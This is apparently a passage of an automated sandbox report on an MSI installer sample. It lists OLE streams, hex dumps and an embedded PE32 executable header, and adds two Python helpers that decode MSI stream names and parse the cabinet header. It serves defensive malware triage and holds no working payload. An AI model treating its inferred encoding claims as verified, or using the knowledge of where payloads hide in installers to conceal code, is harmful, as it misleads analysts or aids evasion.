                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . w w . . . . . . . . . . . . w . f . w . . . . . . w . . . . . v v f . w . . . . . . . . . . . n f f l . w . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17790\x17640\x17188\x17205\x18470
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.6676615263
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . ( . . . { . w . . . . . . . . . ( x x x . . . . . . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17918\x16740\x16677\x17318
                                  File Type:PC bitmap, Windows 3.x format, 1 x 200 x 24
                                  Stream Size:854
                                  Entropy:3.80253159876
                                  Base64 Encoded:False
                                  Data ASCII:B M V . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:42 4d 56 03 00 00 00 00 00 00 36 00 00 00 28 00 00 00 01 00 00 00 c8 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ef f3 f4 00 ef f3 f4 00 ef f3 f4 00 ef f4 f4 00 ef f4 f4 00 ef f4 f5 00 ef f4 f5 00 ef f4 f5 00 ef f4
                                  General
                                  Stream Path:\x17163\x16689\x18229\x18046\x16940\x16954\x18357\x18152\x18472
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Stream Size:399328
                                  Entropy:6.5891658431
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . M . . , N . . , N . . , N . B ^ M . . , N . B ^ K . = , N . . Y J . . , N . . Y M . . , N . . Y K . . , N . B ^ J . . , N . B ^ H . . , N . B ^ O . . , N . . , O . . , N . ( Y G . . , N . ( Y . . . , N . . , . . . , N . ( Y L . . , N . R i c h . , N .
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
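The Stream Path values in these records are the raw OLE stream names of the MSI. Windows Installer stores table and Binary-entry names in a compressed encoding, so the report as printed does not tell an analyst which stream is a table, which is the cabinet and which is a loose payload. The decoder below is an added example, not part of the Joe Sandbox report or of the sample; it assumes (inferred from the data, the tool does not document it) that every `\xNNNNN` token is the decimal value of one UTF-16 code unit, e.g. `\x18496` is U+4840, the `!` prefix that marks a table. Applied to the records here it yields the standard `!_Tables`, `!_Columns`, `!_StringData` and `!_StringPool` streams, `disk1.cab` for the cabinet stream, and `Binary.viewer.exe` for the PE32 stream, i.e. a Binary-table entry carried inside the database rather than inside the cabinet. The `classify_stream` labels and the `SAMPLE_PATHS` list are this example's own.

```python
import re

# The six-bit alphabet of the MSI stream-name encoding (values 0..63).
_MSI_ALPHABET = ("0123456789"
                 "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                 "abcdefghijklmnopqrstuvwxyz"
                 "._")

# Stream paths copied verbatim from the report records on this page.
SAMPLE_PATHS = [
    r"\x18496\x16255\x16740\x16943\x18486",                               # a table
    r"\x18496\x15167\x17394\x17464\x17841",                               # a table
    r"\x18496\x16191\x17783\x17516\x15978\x17586\x18479",                 # a table
    r"\x17191\x17334\x18305\x16678\x18469",                               # the cabinet
    r"\x17163\x16689\x18229\x18046\x16940\x16954\x18357\x18152\x18472",   # the PE32 stream
]


def decode_msi_stream_name(encoded):
    """Decode a raw MSI stream name (as an OLE reader returns it) to plain text.

    Each UTF-16 code unit in U+3800..U+47FF packs two six-bit characters,
    low six bits first; U+4800..U+483F packs a single one; U+4840 is the '!'
    prefix that marks a database table. Anything else is copied through.
    """
    out = []
    for ch in encoded:
        c = ord(ch)
        if 0x3800 <= c < 0x4800:
            c -= 0x3800
            out.append(_MSI_ALPHABET[c & 0x3F])
            out.append(_MSI_ALPHABET[c >> 6])
        elif 0x4800 <= c < 0x4840:
            out.append(_MSI_ALPHABET[c - 0x4800])
        elif c == 0x4840:
            out.append("!")
        else:
            out.append(ch)
    return "".join(out)


_REPORT_TOKEN = re.compile(r"\\x(\d+)")


def decode_report_path(path):
    """Decode a 'Stream Path' written in the report's own notation.

    Assumption (inferred from the data, not documented by the tool): every
    '\\xNNNNN' token is the DECIMAL value of one UTF-16 code unit, so
    '\\x18496' is U+4840. Tokens are turned back into characters, then decoded.
    """
    raw = _REPORT_TOKEN.sub(lambda m: chr(int(m.group(1))), path)
    return decode_msi_stream_name(raw)


def classify_stream(decoded):
    """Coarse triage label: table, Binary-table payload, embedded cabinet, other."""
    if decoded.startswith("!"):
        return "table"
    if decoded.startswith("Binary."):
        return "binary-table payload"
    if decoded.lower().endswith(".cab"):
        return "embedded cabinet"
    return "other"


def decode_streams(paths):
    """Return [(report_path, decoded_name, label)] for a list of report paths."""
    rows = []
    for p in paths:
        name = decode_report_path(p)
        rows.append((p, name, classify_stream(name)))
    return rows


if __name__ == "__main__":
    for encoded, name, label in decode_streams(SAMPLE_PATHS):
        print("%-22s %-20s %s" % (label, name, encoded))
```

When working from the MSI itself rather than from the report, feed the names returned by an OLE reader straight into `decode_msi_stream_name`; only the `\xNNNNN` conversion in `decode_report_path` is specific to how this report prints them.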
                                  General
                                  Stream Path:\x17191\x17334\x18305\x16678\x18469
                                  File Type:Microsoft Cabinet archive data, 3753879 bytes, 4 files
                                  Stream Size:3753879
                                  Entropy:7.997971703
                                  Base64 Encoded:True
                                  Data ASCII:M S C F . . . . . G 9 . . . . . , . . . . . . . . . . . . . . . . . . . . . . . H . . . . & > . . . . . . . . R . C . c o r e l i b . d l l . . . . . . & > . . . . R . C . M o n o H e l p e r . d l l . . . ) . . . J . . . . R . C . S y s t e m . d l l . . . / . . . t . . . . R . C . S y s t e m . X m l . d l l . . . . . N 9 . . C K . : . t . . u . o f . . . . J Z . 4 . . - . . . y < . Z . V . . . - . . m . . . . . . q . . . . . ^ . k . . e . 1 . 4 . . . . 6 M . . . . . . i h O . ` . . . ` . . . q
                                  Data Raw:4d 53 43 46 00 00 00 00 97 47 39 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 04 00 00 00 d2 04 00 00 a1 00 00 00 48 01 01 00 00 26 3e 00 00 00 00 00 00 00 b2 52 c3 43 20 00 63 6f 72 65 6c 69 62 2e 64 6c 6c 00 00 e8 0b 00 00 26 3e 00 00 00 b2 52 a4 43 20 00 4d 6f 6e 6f 48 65 6c 70 65 72 2e 64 6c 6c 00 00 fa 29 00 00 0e 4a 00 00 00 b2 52 a4 43 20 00 53 79 73 74 65 6d 2e 64 6c
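The first 128 bytes of the cabinet stream already hold the CFHEADER, the single CFFOLDER and most of the CFFILE list, so the member names, sizes and timestamps can be read from the Data Raw line above without extracting the 3.7 MB stream. The parser below is an added example written for this page, not tooling from the report or from the sample; it works on that hex as printed and treats the 128-byte cut-off as the normal case, reporting how far the file list could be recovered instead of failing. Field layout, the MSZIP folder type and the MS-DOS timestamp decoding follow the public cabinet format; the keys of the returned dictionary are this example's own.

```python
import struct

# First 128 bytes of the disk1.cab stream exactly as the report's "Data Raw"
# line prints them; the report truncates the dump after 128 bytes, so the
# third CFFILE entry is cut off in the middle of its name.
CAB_DUMP_HEX = (
    "4d 53 43 46 00 00 00 00 97 47 39 00 00 00 00 00 2c 00 00 00 00 00 00 00 "
    "03 01 01 00 04 00 00 00 d2 04 00 00 a1 00 00 00 48 01 01 00 00 26 3e 00 "
    "00 00 00 00 00 00 b2 52 c3 43 20 00 63 6f 72 65 6c 69 62 2e 64 6c 6c 00 "
    "00 e8 0b 00 00 26 3e 00 00 00 b2 52 a4 43 20 00 4d 6f 6e 6f 48 65 6c 70 "
    "65 72 2e 64 6c 6c 00 00 fa 29 00 00 0e 4a 00 00 00 b2 52 a4 43 20 00 53 "
    "79 73 74 65 6d 2e 64 6c"
)

COMPRESSION = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}
FLAG_PREV, FLAG_NEXT, FLAG_RESERVE = 0x0001, 0x0002, 0x0004


def dos_datetime(date, time):
    """Render the MS-DOS packed date/time stored in a CFFILE as ISO 8601."""
    return "%04d-%02d-%02d %02d:%02d:%02d" % (
        1980 + (date >> 9), (date >> 5) & 0x0F, date & 0x1F,
        time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2)


def _skip_cstring(data, pos):
    """Position just past the NUL-terminated string at pos, or None if cut off."""
    end = data.find(b"\0", pos)
    return None if end < 0 else end + 1


def parse_cab_header(data):
    """Parse CFHEADER, the first CFFOLDER and every CFFILE that is complete in
    `data`. A truncated buffer sets 'truncated' instead of raising, so a
    128-byte report dump can still be triaged."""
    if len(data) < 36 or data[:4] != b"MSCF":
        raise ValueError("not a CFHEADER (missing MSCF signature)")
    (cb_cabinet, coff_files, ver_minor, ver_major, c_folders, c_files,
     flags, set_id, _i_cabinet) = struct.unpack_from("<4xI4xI4xBBHHHHH", data, 4)

    pos = 36
    if flags & FLAG_RESERVE:                      # optional reserve block follows the header
        cb_cfheader, _cb_cffolder, _cb_cfdata = struct.unpack_from("<HBB", data, pos)
        pos += 4 + cb_cfheader
    for flag in (FLAG_PREV, FLAG_NEXT):           # szCabinetPrev/szDiskPrev, szCabinetNext/szDiskNext
        if flags & flag:
            for _ in range(2):
                pos = _skip_cstring(data, pos)
                if pos is None:
                    raise ValueError("header chain strings truncated")
    if pos + 8 > len(data):
        raise ValueError("CFFOLDER truncated")
    coff_cab_start, c_cfdata, type_compress = struct.unpack_from("<IHH", data, pos)
    folder = {"coff_cab_start": coff_cab_start, "c_cfdata": c_cfdata,
              "compression": COMPRESSION.get(type_compress & 0x0F, "unknown")}

    files, truncated, pos = [], False, coff_files
    for _ in range(c_files):
        if pos + 16 > len(data):
            truncated = True
            break
        cb_file, uoff, i_folder, fdate, ftime, attribs = struct.unpack_from("<IIHHHH", data, pos)
        end = data.find(b"\0", pos + 16)
        if end < 0:                               # name cut off: the dump ends here
            truncated = True
            break
        # attribute 0x80 (_A_NAME_IS_UTF) marks a UTF-8 name; otherwise it is OEM text
        name = data[pos + 16:end].decode("utf-8" if attribs & 0x80 else "cp437", "replace")
        files.append({"name": name, "size": cb_file, "folder_offset": uoff,
                      "folder": i_folder, "attribs": attribs,
                      "mtime": dos_datetime(fdate, ftime)})
        pos = end + 1

    # Within one folder the uncompressed offsets must be cumulative; a mismatch
    # means a hand-edited header or a mis-parsed entry.
    consistent = all(b["folder_offset"] == a["folder_offset"] + a["size"]
                     for a, b in zip(files, files[1:]) if a["folder"] == b["folder"])
    return {"cabinet_size": cb_cabinet, "version": "%d.%d" % (ver_major, ver_minor),
            "folders": c_folders, "files_declared": c_files, "flags": flags,
            "set_id": set_id, "folder": folder, "files": files,
            "truncated": truncated, "offsets_consistent": consistent}


def parse_report_dump(hex_dump=CAB_DUMP_HEX):
    """Parse the report's hex dump (bytes.fromhex accepts the spaces between bytes)."""
    return parse_cab_header(bytes.fromhex(hex_dump))


if __name__ == "__main__":
    r = parse_report_dump()
    print("cabinet %d bytes, %d folder(s), %d file(s) declared, %s, truncated=%s"
          % (r["cabinet_size"], r["folders"], r["files_declared"],
             r["folder"]["compression"], r["truncated"]))
    for f in r["files"]:
        print("  %-16s %9d bytes  @%-8d %s" % (f["name"], f["size"], f["folder_offset"], f["mtime"]))
```

Run as a script it confirms the 3753879-byte cabinet size the report lists, one MSZIP folder, four declared files, and recovers corelib.dll and MonoHelper.dll with their sizes and a 2021-05-18 timestamp; the third entry (System.dll, visible only in the Data ASCII line) is cut mid-name, so `truncated` is True and the caller knows the four declared members were not all recovered from the dump.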
                                  General
                                  Stream Path:\x18496\x15167\x17394\x17464\x17841
                                  File Type:data
                                  Stream Size:1424
                                  Entropy:4.90033147389
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . + . + . + . + . + . + . + . + . + . 5 . 5 . 5 . 9 . 9 . 9 . > . > . > . > . > . A . A . A . A . A . A . O . O . O . O . O . O . O . Q . Q . Q . V . V . V . V . V . V . V . V . V . X . X . Z . Z . \\ . \\ . \\ . ] . ] . ] . ^ . ^ . ^ . ^ . a . a . a . b . b . b . b . b . b . d . d . d . f . f . f . f . f . f . f . f . f . f . f . f . i . i . i . i . i . i . i . i . k . k . k . k . k . k . p . p . p . p . r . r . r . r . t . t . t . t . t . t .
                                  Data Raw:04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 20 00 20 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 35 00 35 00 35 00 39 00 39 00 39 00 3e 00 3e 00 3e 00 3e 00 3e 00 41 00 41 00 41 00 41 00 41 00 41 00 4f 00 4f 00 4f 00 4f 00 4f 00 4f 00 4f 00 51 00 51 00 51 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 58 00 58 00
                                  General
                                  Stream Path:\x18496\x15498\x15359\x17388\x15208\x18098\x17393\x16690\x18471
                                  File Type:data
                                  Stream Size:12
                                  Entropy:2.61749246118
                                  Base64 Encoded:False
                                  Data ASCII:M . N . O . P . Q . . .
                                  Data Raw:4d 01 4e 01 4f 01 50 01 51 01 11 80
                                  General
                                  Stream Path:\x18496\x15518\x16925\x17915
                                  File Type:data
                                  Stream Size:444
                                  Entropy:5.30938688259
                                  Base64 Encoded:False
                                  Data ASCII:D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . $ . & . ( . * . , . . . 0 . 2 . 3 . 5 . 7 . 9 . ; . = . ? . A . C . D . F . H . I . K . M . O . Q . R . S . U . W . Y . [ . ] . _ . ` . a . c . e . g . i . k . m . o . q . s . u . w . y . { . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . .
                                  Data Raw:44 01 d2 06 d4 06 d5 06 d7 06 d9 06 db 06 dc 06 de 06 df 06 e0 06 e2 06 e3 06 e5 06 e7 06 e8 06 ea 06 ec 06 ee 06 f0 06 f2 06 f4 06 f5 06 f7 06 f9 06 fb 06 fd 06 ff 06 01 07 03 07 05 07 07 07 09 07 0a 07 0c 07 0e 07 10 07 12 07 14 07 16 07 18 07 1a 07 1c 07 1e 07 20 07 22 07 24 07 26 07 28 07 2a 07 2c 07 2e 07 30 07 32 07 33 07 35 07 37 07 39 07 3b 07 3d 07 3f 07 41 07 43 07 44 07
                                  General
                                  Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                  File Type:data
                                  Stream Size:85644
                                  Entropy:4.96011447798
                                  Base64 Encoded:True
                                  Data ASCII:A t t r i b u t e s P a t c h S i z e F i l e _ P a t c h T y p e A c t i o n C o n d i t i o n S e q u e n c e C o s t F i n a l i z e C o s t I n i t i a l i z e T a b l e N a m e I n s t a l l F i n a l i z e I n s t a l l I n i t i a l i z e I n s t a l l V a l i d a t e A d v t E x e c u t e S e q u e n c e C r e a t e S h o r t c u t s M s i P u b l i s h A s s e m b l i e s P u b l i s h C o m p o n e n t s P u b l i s h F e a t u r e s P u b l i s h P r o d u c t R e g i s t e r C l a s s I n f o R
                                  Data Raw:41 74 74 72 69 62 75 74 65 73 50 61 74 63 68 53 69 7a 65 46 69 6c 65 5f 50 61 74 63 68 54 79 70 65 41 63 74 69 6f 6e 43 6f 6e 64 69 74 69 6f 6e 53 65 71 75 65 6e 63 65 43 6f 73 74 46 69 6e 61 6c 69 7a 65 43 6f 73 74 49 6e 69 74 69 61 6c 69 7a 65 54 61 62 6c 65 4e 61 6d 65 49 6e 73 74 61 6c 6c 46 69 6e 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 49 6e 69 74 69 61 6c 69 7a 65 49 6e 73 74 61
                                  General
                                  Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                  File Type:data
                                  Stream Size:7804
                                  Entropy:3.45148937466
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . . . . . . . m . . . ; . B . . . . . . . . . . . . . M . . . . . o . . . . . . . . . . .
                                  Data Raw:e4 04 00 00 0a 00 0e 00 09 00 02 00 05 00 02 00 05 00 0d 00 04 00 04 00 06 00 12 00 09 00 2b 00 08 00 10 00 0c 00 06 00 0e 00 06 00 00 00 00 00 05 00 02 00 04 00 06 00 0f 00 03 00 11 00 03 00 0f 00 04 00 13 00 07 00 0f 00 03 00 14 00 03 00 11 00 03 00 0f 00 03 00 0e 00 03 00 11 00 03 00 15 00 03 00 10 00 03 00 12 00 03 00 0c 00 05 00 07 00 02 00 06 00 02 00 06 00 02 00 0a 00 02 00
                                  General
                                  Stream Path:\x18496\x16255\x16740\x16943\x18486
                                  File Type:data
                                  Stream Size:78
                                  Entropy:3.72765014155
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . + . 5 . 9 . > . A . O . Q . V . X . Z . \\ . ] . ^ . a . b . d . f . i . k . p . r . t . x . ~ . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:04 00 07 00 11 00 1b 00 20 00 2b 00 35 00 39 00 3e 00 41 00 4f 00 51 00 56 00 58 00 5a 00 5c 00 5d 00 5e 00 61 00 62 00 64 00 66 00 69 00 6b 00 70 00 72 00 74 00 78 00 7e 00 7f 00 83 00 ab 00 b9 00 bc 00 da 00 fb 00 00 01 04 01 18 01
                                  General
                                  Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                  File Type:data
                                  Stream Size:4272
                                  Entropy:2.57636734591
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . + . + . + . + . + . + . + . + . + . 5 . 5 . 5 . 9 . 9 . 9 . > . > . > . > . > . A . A . A . A . A . A . O . O . O . O . O . O . O . Q . Q . Q . V . V . V . V . V . V . V . V . V . X . X . Z . Z . \\ . \\ . \\ . ] . ] . ] . ^ . ^ . ^ . ^ . a . a . a . b . b . b . b . b . b . d . d . d . f . f . f . f . f . f . f . f . f . f . f . f . i . i . i . i . i . i . i . i . k . k . k . k . k . k . p . p . p . p . r . r . r . r . t . t . t . t . t . t .
                                  Data Raw:04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 20 00 20 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 35 00 35 00 35 00 39 00 39 00 39 00 3e 00 3e 00 3e 00 3e 00 3e 00 41 00 41 00 41 00 41 00 41 00 41 00 4f 00 4f 00 4f 00 4f 00 4f 00 4f 00 4f 00 51 00 51 00 51 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 58 00 58 00
                                  General
                                  Stream Path:\x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481
                                  File Type:data
                                  Stream Size:20
                                  Entropy:2.89546184424
                                  Base64 Encoded:False
                                  Data ASCII:^ . . . . . . . . . . . . . . . . . . .
                                  Data Raw:5e 01 af 06 c1 06 c3 06 c5 06 c7 06 c8 06 c2 06 c4 06 c6 06
                                  General
                                  Stream Path:\x18496\x16667\x17191\x15090\x17912\x17591\x18481
                                  File Type:data
                                  Stream Size:36
                                  Entropy:3.62798680688
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . @ . @ . . . . . . . . . . . . .
                                  Data Raw:9f 01 9f 01 01 80 02 80 a0 01 cb 06 05 80 05 80 05 80 19 80 40 81 40 81 14 80 0f 80 ca 06 cc 06 00 00 00 00
                                  General
                                  Stream Path:\x18496\x16778\x17207\x17522\x16925\x17915
                                  File Type:data
                                  Stream Size:450
                                  Entropy:4.73721029883
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . > . C . . . . . . . . . . . . . . . . . . . . . . . . . ! . $ . & . ) . , . 1 . 5 . 8 . : . ; . > . A . B . E . G . I . N . Q . U . W . Y . ] . b . e . h . j . q . t . w . y . | . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . 7 . L . . . 3 . S . [ . _ . ` . / . m . o . . . M . . . . . . . . . . . . . . . . . . . . . . . . . " . % . ' . * . - . 2 . 6 . 9 . 6 . < . ? . 7 . C . F . H . J . O . R . V . X . Z . ^ . c . f . i . k . r .
                                  Data Raw:09 00 0a 00 10 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 3e 01 43 01 ff 01 01 02 04 02 08 02 0d 02 0f 02 12 02 15 02 18 02 1b 02 1d 02 1e 02 21 02 24 02 26 02 29 02 2c 02 31 02 35 02 38 02 3a 02 3b 02 3e 02 41 02 42 02 45 02 47 02 49 02 4e 02 51 02 55 02 57 02 59 02 5d 02 62 02 65 02 68 02 6a 02 71 02 74 02 77 02 79 02 7c 02 7e 02 81 02 83 02 85 02 87 02 8a 02 8c 02
                                  General
                                  Stream Path:\x18496\x16786\x17522
                                  File Type:data
                                  Stream Size:4
                                  Entropy:1.5
                                  Base64 Encoded:False
                                  Data ASCII:i . . .
                                  Data Raw:69 01 01 00
                                  General
                                  Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                  File Type:data
                                  Stream Size:48
                                  Entropy:3.38186998233
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . A . G . . . . . . . . . . . . . . . . . . . . . . . . x . < . . . . .
                                  Data Raw:09 00 0a 00 0e 00 0f 00 10 00 18 02 41 02 47 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 3c 8f 84 83 a0 8f
                                  General
                                  Stream Path:\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
                                  File Type:data
                                  Stream Size:66
                                  Entropy:3.77043919502
                                  Base64 Encoded:False
                                  Data ASCII:. . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:09 00 0a 00 41 02 a4 02 a5 02 a6 02 a7 02 a8 02 a9 02 aa 02 ab 02 00 00 00 00 00 00 00 00 00 00 51 01 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 84 83 00 85 ce 84 01 80 14 85 ff 7f fd 7f 8c 80 fe 7f
                                  General
                                  Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                  File Type:data
                                  Stream Size:84
                                  Entropy:3.43893323285
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . j . 8 . . . . . . . \\ . $ . . .
                                  Data Raw:09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 94 91 6a 98 38 98 9c 98 00 99 f8 91 5c 92 24 93 c0 92
                                  General
                                  Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                  File Type:data
                                  Stream Size:28
                                  Entropy:2.20183873051
                                  Base64 Encoded:False
                                  Data ASCII:# . # . # . # . # . # . # . $ . % . & . ' . ( . ) . * .
                                  Data Raw:23 00 23 00 23 00 23 00 23 00 23 00 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2a 00
                                  General
                                  Stream Path:\x18496\x16911\x17892\x17784\x18472
                                  File Type:data
                                  Stream Size:16
                                  Entropy:2.22460175271
                                  Base64 Encoded:False
                                  Data ASCII:# . . . # . 4 . . . . . $ . . .
                                  Data Raw:23 00 00 00 23 00 34 00 01 80 01 80 24 00 00 80
                                  General
                                  Stream Path:\x18496\x16918\x17191\x18468
                                  File Type:MIPSEB Ucode
                                  Stream Size:14
                                  Entropy:1.95021206491
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . .
                                  Data Raw:01 80 04 00 00 80 00 00 c9 06 00 00 00 00
                                  General
                                  Stream Path:\x18496\x16923\x17194\x17910\x18229
                                  File Type:SysEx File -
                                  Stream Size:24
                                  Entropy:3.10538854221
                                  Base64 Encoded:False
                                  Data ASCII:. . 9 . . . . . : . : . . . 9 . < . ; . % . % .
                                  Data Raw:f0 00 39 01 ff 7f ff 7f 3a 01 3a 01 f0 00 39 01 3c 01 3b 01 25 00 25 00
                                  General
                                  Stream Path:\x18496\x16925\x17915\x17884\x17404\x18472
                                  File Type:data
                                  Stream Size:48
                                  Entropy:3.09028891162
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:d8 01 cd 06 d0 06 d1 06 cf 06 ce 06 cf 06 cf 06 08 80 0d 80 08 80 08 80 00 00 00 80 00 00 00 80 00 00 00 80 ff ff ff 80 00 80 01 80 01 80 00 80
                                  General
                                  Stream Path:\x18496\x17100\x16808\x15086\x18162
                                  File Type:data
                                  Stream Size:12
                                  Entropy:2.35538854221
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . Q . Q . Q .
                                  Data Raw:f1 01 bb 02 bc 02 51 01 51 01 51 01
                                  General
                                  Stream Path:\x18496\x17163\x16689\x18229
                                  File Type:data
                                  Stream Size:108
                                  Entropy:3.11492446487
                                  Base64 Encoded:False
                                  Data ASCII:k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
